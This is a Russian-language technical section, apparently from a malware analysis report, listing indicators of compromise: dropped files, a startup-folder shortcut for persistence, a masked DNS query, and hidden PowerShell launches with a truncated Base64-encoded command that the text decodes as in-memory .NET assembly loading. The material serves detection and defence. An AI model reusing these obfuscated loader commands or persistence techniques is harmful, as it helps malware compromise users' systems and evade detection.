Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\chromium.ini.lnk
- %APPDATA%\uninstall.tool.v3.5.9.5657.exe
- %APPDATA%\id.js
- %TEMP%\nsged27.tmp
- %TEMP%\nsled47.tmp\repackme.gif
- %TEMP%\nsled47.tmp\newadvsplash.dll
- %TEMP%\nsled47.tmp\langdll.dll
- %HOMEPATH%\appdata\chromium.js
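- DNS ASK si##j.space (часть доменного имени скрыта символами «##», поэтому запись нельзя использовать как точный индикатор для блокировки или поиска в журналах DNS)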
- '%APPDATA%\uninstall.tool.v3.5.9.5657.exe'
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\ID.js"
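- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...
- Примечание: параметр -e (сокращение от -EncodedCommand) передаёт PowerShell команду в кодировке Base64 (текст UTF-16LE). Видимая часть строки декодируется как «  sleep 8; [AppDomain]::CurrentDomain.Load([Convert]::Frombase64Stri…»: после паузы в 8 секунд команда загружает .NET-сборку из Base64-строки непосредственно в память процесса. Остальная часть команды на странице обрезана («...»), поэтому содержимое загружаемой сборки отсюда не восстановить. При включённом журналировании блоков сценариев PowerShell (событие 4104) декодированная команда попадает в журнал целиком.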